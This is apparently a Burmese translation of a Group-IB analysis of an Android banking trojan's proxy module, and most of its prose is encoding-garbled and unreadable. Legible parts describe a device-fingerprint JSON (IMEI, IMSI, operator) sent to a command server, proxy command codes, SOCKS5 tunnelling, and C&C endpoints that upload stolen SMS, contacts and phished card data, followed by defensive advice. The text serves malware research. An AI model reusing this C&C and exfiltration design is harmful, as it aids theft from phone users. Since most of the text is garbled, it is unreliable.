Proxy module á០áá¯ááºáá±á¬ááºááá·áº áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážá¡á¬ážáá¯á¶ážááᯠááá¯ááºáá»á¬ážáá²ááá¯á· á¡áá±á¬áá·áºáááºáá¬ážáááºá áááºážááá¯áá¯ááºáá±á¬ááºáááºá ááŒááºáááá¯ááŸá±á¬ááºááŸá¯ááŸá á¡ááá®áá±ážááŸááºážááẠááŸááºáááºážááá¯ááºáá»á¬ážááᯠááááºážáááºážáá¬ážááá·áº âááŸááºáááºážáá»á¬ážâ (ProxyConfigClass.logsDir á¡ááœááº) áá¯áá±á«áºáá±á¬ áááºážááœáŸááºáá áºáá¯ááᯠáááºáá®ážáááºá á¡áááºáá»á¬ážáá«áá±á¬ ááá¯ááºáá»á¬ážááœáẠááŸááºáááºážáá±ážááŒááºážááẠááŒá áºáá±á«áºáááº-
- main.txt - CommandServer áá¯áá±á«áºáá±á¬ class áá¡áá¯ááºááẠá€ááá¯ááºááá¯á·áááºáá±á¬ááºáá¬ážáááºá á¡á±á¬ááºááœááºáá±á¬áºááŒáá¬ážáá±á¬á¡áá»ááºááŸá¬á á€ááá¯ááºáá²ááá¯á· string str ááᯠáá±á¬á·ááºá¡ááºáááºááŒááºážááẠmainLog(str) á¡ááŒá ẠááŸááºáá°áááºááŒá áºáááºá
- session-<%id%>.txt â á€ááá¯ááºááẠáá®ážááŒá¬áž proxy á ááºááŸááºáá áºáá¯ááŸáá·áº áááºá ááºáá±áá±á¬ ááŸááºáááºážáá±áá¬ááᯠááááºážáááºážáááºá á¡á±á¬ááºááœááºáá±á¬áºááŒáá¬ážáá±á¬á¡áá»ááºááŸá¬á á€ááá¯ááºááœáẠstring str ááᯠáá±á¬á·ááºá¡ááºáá¯ááºááŒááºážááᯠsessionLog (str) á¡ááŒá ẠááŸááºáá°áá«áááºá
- server.txt - á€ááá¯ááºááᯠá¡áááºáá±á¬áºááŒáá«ááá¯ááºáá»á¬ážááá¯á· áá±ážáá¬ážáá±á¬ á¡áá»ááºá¡áááºá¡á¬ážáá¯á¶ážááᯠááŸááºáááºážáááºáááºá¡ááœáẠá¡áá¯á¶ážááŒá¯áá«áááºá
ááŸááºáááºážáá±áá¬áá±á¬áºáááº-
<%Date%> [Thread[<%thread id%>]á id[]]- ááŸááºáááºáž-á á¬ááŒá±á¬ááºáž
Proxy module ááá¯ááºáá±á¬ááºááŸá¯á¡ááœááºáž ááŒá áºáá±á«áºááá·áºááŒáœááºážáá»ááºáá»á¬ážááᯠááá¯ááºáá áºáá¯ááá¯á·áááºáž ááŸááºáááºážáááºáá¬ážáááºá áááºážááá¯áá¯ááºáá±á¬ááºáááºá á¡ááá®áá±ážááŸááºážááẠá¡á±á¬ááºáá«áá±á¬áºáááºááŒáá·áº JSON á¡áá¬ááá¹áá¯áá áºáá¯ááᯠáá¯ááºáá±ážáááº-
{
"uncaughtException":<%short description of throwable%>
"thread":<%thread%>
"message":<%detail message of throwable%>
"trace": //Stack trace info
[
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
},
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
}
]
}
ááá¯á·áá±á¬áẠáááºážááᯠááŒáá¯ážáá áºáá»á±á¬ááºáž ááá¯ááºá á¬ážááŒá¯ááŸá¯á¡ááŒá áºááá¯á· ááŒá±á¬ááºážááŒá®áž áááºážááᯠááŸááºáááºážáááºáááºá
áááºááá¯ááºáᬠcommand ááá¯áááºáá¶áááŸáááŒá®ážáá±á¬áẠProxy module ááᯠá áááºááá¯ááºáá«ááŒá®á Proxy module ááá¯á áááºááẠcommand ááá¯áááºáá¶áááŸááá±á¬á¡áá«á á¡ááá®áá±ážááŸááºážáááºáá±á«áºáá±á¬áááºáá±á¬ááºááŸá¯áá áºáá¯á áááºáááºá áááºááááºáá±á¬ááºááŸá¯Proxy module ááá¯ááºáá±á¬ááºáá»ááºááᯠá á®áá¶ááá·áºááœá²ááẠáá¬áááºááŸááá±á¬á áááºážááᯠá áááºááŒááºážááŸáá·áº áááºááá·áºááŒááºážá
áááºáá±á¬ááºááŸá¯á áááºááá·áº á¡ááá·áºáá»á¬áž-
1. áá
áºáááá
áºáá»áŸáẠáá
áºááŒáááºáááºáááºááá·áº á¡áá»áááºááá¯ááºážáááááá¬ááᯠá
áááºááŒá®áž Proxy áá±á¬áºáá»á°ážá áá¯ááºáá±á¬ááºáá»ááºááᯠá
á
áºáá±ážáááºá áá±á¬áºáá»á°ážááẠá¡áááºááááºáá«á áááºážááᯠá
áááºáááºá
á¡ááŒá
áºá¡áá»ááºá á¡á
áá»áá¯ážááá¯ááºáá¬áááºáž ááŒá
áºáá«áááºá android.net.conn.CONNECTIVITY_CHANGE Proxy module ááᯠá
áááºááá¯ááºáá«ááŒá®á
2. á¡ááá®áá±ážááŸááºážááẠááá·áºáááºáá»ááºááŒáá·áº ááŸáá¯ážááŒááºáž-áá±á¬á·ááºááᯠáááºáá®ážáááºá PARTIAL_WAKE_LOCK áá°á·ááá¯áááºážáááºá áááºážááẠá ááºáá á¹á ááºáž CPU ááᯠá¡áááºá ááºááŒááºážáá¯ááºááá¯á· ááá±á¬ááºá¡á±á¬áẠáá¬ážáá®ážáá±ážáááºá
3. Proxy module á command processing class ááᯠá áááºááŒá®áž ááá¯ááºážááᯠáŠážá áœá¬ áá±á¬á·ááºáá¯ááºáá«á mainLog("á áááºáá¬áá¬") О
áá¬áá¬-:start() host[<%proxy_cnc%>]á commandPort[<%command_port%>]á proxyPort[<%proxy_port%>]
áááºááŸá¬ proxy_cncá command_port ááŸáá·áº proxy_port - Proxy server configuration ááŸáááŸááá±á¬ parameters áá»á¬ážá
command processing class ááᯠáá±á«áºáá«áááºá CommandConnection. á áááºááŒá®ážáá±á¬ááºáá»ááºáá»ááºážá á¡á±á¬ááºáá«áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážááᯠáá¯ááºáá±á¬ááºáá«-
4. ááá¯á· áá»áááºáááºáááºá ProxyConfigClass.host: ProxyConfigClass.commandPort JSON áá±á¬áºáááºááŒáá·áº ááá¯áá±áá¬ááœáẠáá°ážá ááºáá¶áá¬ážááá±á¬ á ááºáá á¹á ááºážá¡ááŒá±á¬ááºáž áá±áá¬ááᯠáá±ážááá¯á·áááº-
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}
áááºááŸá¬:
- id â identifier ááẠâxâ á¡áááºááŸá áá»áŸáá±áá¬ážáá±á¬ ááŸá áºáááºáá¬ááá¯ááºá០âidâ á¡ááœááºáá«áá±á¬ áááºááá¯ážáá áºáá¯ááᯠááá°ááẠááŒáá¯ážá á¬ážáááºá á€áááºááá¯ážááᯠááááŸáááá¯ááºáá«áá áááºážááẠá¡áá áºáá áºáá¯áá¯ááºáá±ážáááºá ááá¯á·ááŒá±á¬áá·áºá Proxy module ááœáẠBot ID ááŸáá·áº á¡áá¬ážáá°áá¯ááºáá±ážááá·áº áááºážáááá¯ááºááá¯ááºá¡ááŸááºá¡áá¬ážáá áºáá¯ááŸááááºá
- imei â á ááºá IMEIá áááºááá¯ážááá°ááá·áº áá¯ááºáááºážá ááºá¡ááœááºáž á¡ááŸá¬ážá¡ááœááºážáá áºáᯠááŒá áºáá±á«áºáá²á·áá«áá á€á¡ááœááºá¡á á¬áž á¡ááŸá¬ážá¡ááœááºáž á á¬áá¬ážáááºáá±á·áá»áºááᯠáá±ážáá¬ážáá«áááºá
- imsi â á ááºáá á¹á ááºážá ááá¯ááºáá¶ááᬠááá¯ááá¯ááºážá á¬áááºážááœááºážáá° á¡áá±á¬ááºá¡áá¬ážá áááºááá¯ážááá°ááá·áº áá¯ááºáááºážá ááºá¡ááœááºáž á¡ááŸá¬ážá¡ááœááºážáá áºáᯠááŒá áºáá±á«áºáá²á·áá«áá á€á¡ááœááºá¡á á¬áž á¡ááŸá¬ážá¡ááœááºáž á á¬áá¬ážáááºáá±á·áá»áºááᯠáá±ážáá¬ážáá«áááºá
- áá±á¬áºááẠâ á¡áá¯á¶ážáá¯ááºáá¯ááºá¡ááœáẠá¡áá¯á¶ážááŒá¯áá°ááŒááºááá¯ááºáá±á¬á¡áááºá
- áá¯ááºáá¯ááºáá° â áá¯ááºáá¯ááº/áá¬á·ááºáá² áá¯ááºáá¯ááºáá° (Build.MANUFACTURER)á
- androidVersion - "<%release_version%> (<%os_version%>),<%sdk_version%>" áá±á¬áºáááºááŸá á á¬áááºážáá áºáá¯
- ááá¯ááºáᶠâ á ááºá áááºááŸááááºáá±áá¬á
- PartnerId ááẠááá¬á á¬ááŒá±á¬ááºážáá áºáá¯ááŒá áºáááºá
- packageName â á¡áá¯ááºá¡áááºá
- ááœááºáááºá¡áá»áá¯ážá¡á á¬áž â áááºááŸáááœááºáááºáá»áááºáááºááŸá¯á¡áá»áá¯ážá¡á á¬áž (á¥ááá¬- âWIFIâá âááá¯ááá¯ááºážááºâ)á á¡ááŸá¬ážá¡ááœááºážááŸááá«á null ááŒááºáá±ážáááºá
- hasGsmSupport â true â áá¯ááºážááẠGSM ááᯠáá¶á·ááá¯ážáá«áá ááá¯ááºáá«á ááŸá¬ážáááºá
- simReady â áááºážááºáááºá¡ááŒá±á¡áá±á
- simCountry - ISO ááá¯ááºáá¶áá¯áẠ(áááºážááºáááºáá¶á·ááá¯ážáá±ážáá°á¡áá±á«áºá¡ááŒá±áá¶áááº)á
- networkOperator â á¡á±á¬áºááá±áá¬á¡áááºá áááºááá¯ážááá°ááá·áº áá¯ááºáááºážá ááºá¡ááœááºáž á¡ááŸá¬ážá¡ááœááºážáá áºáᯠááŒá áºáá±á«áºáá²á·áá«áá á€á¡ááœááºá¡á á¬áž á¡ááŸá¬ážá¡ááœááºáž á á¬áá¬ážáááºáá±á·áá»áºááᯠáá±ážáá¬ážáá«áááºá
- simOperator â áááºáá±á¬ááºááŸá¯áá±ážáá°á¡ááẠ(SPN)á áááºááá¯ážááá°ááá·áº áá¯ááºáááºážá ááºá¡ááœááºáž á¡ááŸá¬ážá¡ááœááºážáá áºáᯠááŒá áºáá±á«áºáá²á·áá«áá á€á¡ááœááºá¡á á¬áž á¡ááŸá¬ážá¡ááœááºáž á á¬áá¬ážáááºáá±á·áá»áºááᯠáá±ážáá¬ážáá«áááºá
- áá¬ážááŸááºáž - á€á¡ááœááºááᯠconfig class ááœáẠááááºážáááºážáá¬ážááŒá®ážá bot á á ááºážáááºáá¬ážááŸááºážáá»á¬ážá¡ááœáẠáááºážááẠ"1.6" ááŸáá·áº áá®áá»áŸáááºá
5. áá¬áá¬á០ááœáŸááºááŒá¬ážáá»ááºáá»á¬ážááᯠá á±á¬áá·áºááá¯ááºážááá·áºáá¯ááºááá¯á· ááŒá±á¬ááºážáááºá áá¬áá¬á០ááœáŸááºááŒá¬ážáá»ááºáá»á¬ážááẠáá±á¬áºáááºááŒáá·áº áá¬áá«áááºá
- 0 offset â á¡áááá·áºáá±ážáááºá
- 1 offset â sessionId
- 2 offset â á¡ááŸááº
- áá±á-áá± á
á¡áááá·áºáá
áºáá¯áá±á¬ááºáá¬áá±á¬á¡áá«á á¡ááá®áá±ážááŸááºážááẠááŸááºáááºážáááºáááº-
mainLog("áá±á«ááºážá
á®áž { sessionId<%id%>]á á¡áá»áá¯ážá¡á
á¬áž[<%command%>]á á¡ááŸááº[<%length%>] }")
áá¬áá¬á០á¡á±á¬ááºáá« command áá»á¬ážááᯠááŒá áºááá¯ááºáááº-
á¡ááẠ| á¡áááá·áº | áá±áá¬áá»á¬áž | áá±á«áºááŒáá»áẠ|
---|---|---|---|
áá»áááºáááºááŸá¯á¡áá¯ááºáá® | 0 | áá»áááºáááºááŸá¯ ID | áá»áááºáááºááŸá¯á¡áá áºáá áºáᯠáááºáá®ážáá«á |
á¡ááá»áá»áŒá±á¬ | 3 | á¡áá»ááẠ| Proxy module ááᯠáááááºáá«á |
áááºážáá±á«áẠ| 4 | - | PONG áááºáá±á·ááºá»ááá¯á·áá«á |
PONG áááºáá±á·áá»áºáá áºáá¯ááœáẠ4 bytes áá«áááºááŒá®áž á€áá²á·ááá¯á· ááœá±á·ááááº- 0x04000000.
connectionId command ááá¯áááºáá¶áááŸááá±á¬á¡áá« (áá»áááºáááºááŸá¯á¡áá áºáá áºáá¯áááºáá®ážáááº) CommandConnection class áá áºáá¯á instance áá áºáá¯ááᯠáááºáá®ážáááºá Proxy áá»áááºáááºááŸá¯.
- proxying ááœáẠá¡áááºážááŸá áºáá¯áá«áááºáááº- Proxy áá»áááºáááºááŸá¯ О á¡áá¯á¶áž. á¡áááºážáááºáá®ážáá²á·á¡áá« Proxy áá»áááºáááºááŸá¯ ááááºá á¬ááá¯á·áá»áááºáááºááŒááºážá ProxyConfigClass.host: ProxyConfigClass.proxyPort ááŸáá·áº JSON á¡áá¬ááá¹áá¯ááᯠááŒááºááœá¬ážáááº-
{
"id":<%connectionId%>
}
áá¯á¶á·ááŒááºááŸá¯á¡áá±ááŒáá·áºá áá¬áá¬ááẠáá»áááºáááºááŸá¯áááºáá±á¬ááºááááºááŒá áºááŒá®áž á¡áá±ážááááºážáá¬áá¬áááááºá á¬áá«ááŸááá±á¬ SOCKS5 áááºáá±á·áá»áºááᯠáá±ážááá¯á·áááºá á€áá¬áá¬ááŸáá·áº á¡ááŒááºá¡ááŸáẠáá¯á¶á·ááŒááºááŸá¯ááẠá¡áááºážááŸáááá·áº ááŒá áºáá±á«áºáááºá á¡áá¯á¶áž. áá»áááºáááºááŸá¯ á áá áºááá·áºááœááºážááŸá¯ááᯠá¡á±á¬ááºáá«á¡ááá¯ááºáž ááá¬ážááœááºááŒáá·áº ááá¯ááºá á¬ážááŒá¯ááá¯ááºáááº-
ááœááºááẠá¡ááŒááºá¡ááŸááºáááºááœááºááŸá¯áá»á¬áž
network sniffers áá»á¬ážááŒáá·áº áááºážááŒá±á¬ááºážááœá²ááŒááºážá áááºááŒá¬ááŒááºážááᯠáá¬ááœááºáááºá CnC áá¬áá¬ááŸáá·áº á¡ááá®áá±ážááŸááºážááŒá¬áž á¡ááŒááºá¡ááŸááºá¡áá»áá¯ážáááºáá±á¬ááºááŸá¯ááᯠSSL áááá¯ááá¯áá±á¬ááᯠá¡áá¯á¶ážááŒá¯á áá¬ááœááºááá¯ááºáá«áááºá áá¬áá¬á០ááŸáá·áº áá¬áᬠááŸá áºáá¯áá¯á¶ážá០áá±ážááá¯á·áá±á¬ áá±áá¬á¡á¬ážáá¯á¶ážááᯠJSON áá±á¬áºáááºááŒáá·áº ááŒááá¬ážáááºá á¡ááá®áá±ážááŸááºážááẠáááºáááºáá±á ááºá¡ááœááºáž á¡á±á¬ááºáá«áá±á¬ááºážááá¯áá»ááºáá»á¬ážááᯠáá¯ááºáá±á¬ááºáááº-
- http://<%CnC%>/api/v1/set_state.php - á¡áááá·áºááá¯áá¯ááºáá±á¬ááºááŒááºážáááááºá
- http://<%CnC%>/api/v1/get.php - á¡áááá·áºááá¯áááºáá¶áááŸáááŒááºážá
- http://<%CnC%>/api/v1/load_sms.php â áá°ážá ááºáá¶áá¬ážááá±á¬ á ááºá០SMS á á¬ááá¯áá»á¬ážááᯠáá±á«ááºážáá¯ááºáá¯ááºááŒááºážá
- http://<%CnC%>/api/v1/load_ab.php â áá°ážá ááºáá¶áá¬ážááá±á¬ á ááºá០á¡áááºá¡ááœááºá á¬áááºážááᯠá¡ááºáá¯ááºáááºááŒááºážá
- http://<%CnC%>/api/v1/aevents.php - ááŸá áºáááºáá¬ááá¯ááºááœááºááŸááá±á¬ ááá·áºáááºáá±á¬ááºáá»á¬ážááᯠá¡ááºááááºáá¯ááºáá±á¬á¡áá« áá±á¬ááºážááá¯ááŸá¯ááŒá¯áá¯ááºáááºá
- http://<%CnC%>/api/v1/set_card.php â Google Play Market á¡ááŒá Ạáááºáá±á¬ááºáá¬ážáá±á¬ phishing áááºážááá¯ážááᯠá¡áá¯á¶ážááŒá¯á áááŸááá±á¬áá±áá¬ááᯠá¡ááºáá¯ááºáááºááŒááºážá
- http://<%CnC%>/api/v1/logs.php - ááŸááºáááºážáá±áá¬ááᯠáááºááŒááºážá
- http://<%CnC%>/api/v1/records.php - phishing windows ááŸáááá·áºáááŸááá±á¬áá±áá¬ááá¯áááºááŒááºážá
- http://<%CnC%>/api/v1/set_error.php - ááŒá áºáá±á«áºáá¬áá±á¬ á¡ááŸá¬ážá¡ááœááºážáá áºáá¯ááᯠá¡áááá±ážááŒááºážá
á¡ááŒá¶ááŒá¯áá»ááºáá»á¬áž
áááºážááá¯á·ááá±á¬ááºáááºáá»á¬ážá¡á¬áž ááá¯ááá¯ááºážáááá¯áá»ááºáá»á¬ážá ááŒáááºážááŒá±á¬ááºááŸá¯á០áá¬ááœááºáááºá¡ááœáẠáá¯áá¹ááá®áá»á¬ážááẠáá¯á¶ážá áœá²áá°á ááºáá»á¬ážááœáẠá¡ááá¯áá±á¬á·ááºáá²ááᯠááá·áºááœááºážááŒááºážáááŒá¯áá² á¡áá¹ááá¬ááºááŸááá±á¬ áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážááᯠá á±á¬áá·áºááŒáá·áºáᬠáá¬ážáá®ážááá¯ááºá á±ááá·áº ááŒáá·áºá á¯á¶áá±á¬ááŒá±ááŸááºážáá»ááºáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯ááááºááŒá áºáááºá
ááá¯ááá¯á·áá¯ááºáá±á¬ááºáááºá ááá¯ááá¯ááºážáááá¯áá»ááºáá»á¬ážááᯠáá±á¬ááºááŸááºážááẠáááºááŸááºáááºážáááºážáá»á¬ážááẠáá¯á¶ážá áœá²áá°ááŸáá·áº á¡ááá®áá±ážááŸááºážááá¯ááºááá¯ááºá á¡ááŒá¯á¡áá°ááᯠááá¯ááºážááŒá¬ážá áááºááŒá¬ááŒááºážá¡ááœáẠáááºážááá¬áá»á¬ážááŒáá·áº á¡á¬ážáá±á¬ááºážáá¬ááẠááá¯á¡ááºáá«áááºá á¡áá¬á¡ááœááºááœáẠáá áºáá»á áºáááºáááºááœá±áááºážááá¬ááᯠá¡áá¯á¶ážááŒá¯áá¬ážááá·áº á ááºáá á¹á ááºáž ááŸááºáá¯á¶áááºááŒááºáž áá¯ááºáá±á¬ááºáá»ááºáááºáž áá«áááºááá·áºáááºá áááºážááẠáá¯á¶ááŸááºááá¯ááºáá±á¬ á ááºáá á¹á ááºážáá áºáá¯á០á¡áá±á¬áá·áºáá áºáá¯á¡á¬áž á¡áá¯á¶ážááŒá¯áá±áá»áááºááœáẠááááºáááºáá°ááááºáá²ááá¯á· áá»áá±á¬ááºáá±ááŒá®ááŒá áºáááºááᯠáá¬ážáááºááá¯ááºá á±ááá·áº áááááá¬áá áºáᯠáá±á¬áºáá¯ááºááŒááºážáá¯ááºáá±á¬ááºáá»ááºááá¯áááºáž ááá·áºááœááºážááá·áºáááºá
á¡ááŒá±áá¶á¡áá±ážááŒá®ážáá±á¬á¡áá»ááºááŸá¬ áá¯áá¹ááá®áá»á¬ážááẠá¡ááºáá¬áááºáá±á«áºááœááºáá¬áá ááá¯ááá¯ááºážáá»ááºáááºááœááºáá« ááŒá áºáá±á«áºááá¯ááºááá·áº á¡áá¹ááá¬ááºáá»á¬ážááᯠááááºážáá»á¯ááºááá¯ááºá á±ááá·áº áááºážááŒá±á¬ááºážááœá²ááŒááºážá áááºááŒá¬ááŸá¯áááŸáááá¯ááºááŸá¯ááŒá áºááŒá®áž á¥ááá¬á¡á¬ážááŒáá·áºá ááá¯ááá¯ááºážááºáááºáá¯ááºáááºážá¡ááœáẠá¡ááá®áá±ážááŸááºážáá»á¬ážááœááºá cryptocurrencies ááŸáá·áº á¡ááŒá¬ážáááºááá·áºáá±áá¬ááœááºáááᯠá¡áá±á¬ááºážá¡áááºááŒá¯áá¯ááºáááºá ááœá±áá±ážááœá±áá° áá±á¬ááºááœááºááá¯ááºááẠáááœá±ááŒá±ážááœáŸá²ááŒá±á¬ááºážááŸá¯á
áá¯á¶ážá áœá²áá°áá»á¬ážá¡ááœáẠáá±ážáááºážáá±áž á ááºážáá»ááºážáá»á¬áž-
- Google Play ááŸááœá²á á¡ááŒá¬ážáááºážááŒá áºáá»á¬ážá០Android OS áá«ááá·áº ááá¯ááá¯ááºážá ááºáá á¹á ááºážá¡ááœáẠá¡ááá®áá±ážááŸááºážáá»á¬áž ááááºáááºáá«ááŸáá·áºá á¡ááºááºáá®áá±ážááŸááºážá០áá±á¬ááºážááá¯áá¬ážáá±á¬ á¡ááœáá·áºá¡áá±ážáá»á¬ážááᯠá¡áá°ážááá¯ááŒá¯áá«á
- Android OS á¡ááºááááºáá»á¬ážááᯠáá¯á¶ááŸááºááá·áºááœááºážáá«á
- áá±á«ááºážáá¯ááºáá¯ááºáá¬ážáá±á¬ááá¯ááºáá»á¬ážá extension áá»á¬ážááá¯á¡á¬áá¯á¶á áá¯ááºáá«á
- áá¶ááááŒá áºááœááºá¡áááºážá¡ááŒá áºáá»á¬ážááᯠááááºáááºáá«ááŸáá·áºá
- SMS áááºáá±á·áá»áºáá»á¬ážááœáẠáááºáá¶áááŸááá±á¬ ááá·áºááºáá»á¬ážááᯠáááŸáááºáá«ááŸáá·áºá
áá®áá¬ááºáá¬ážááŸá¬ Semyon RogachevaGroup-IB Computer Forensics Laboratory ááœáẠmalware áá¯áá±ááááá¯ááºáᬠá¡áááºáááºážáá«ááá°á
source: www.habr.com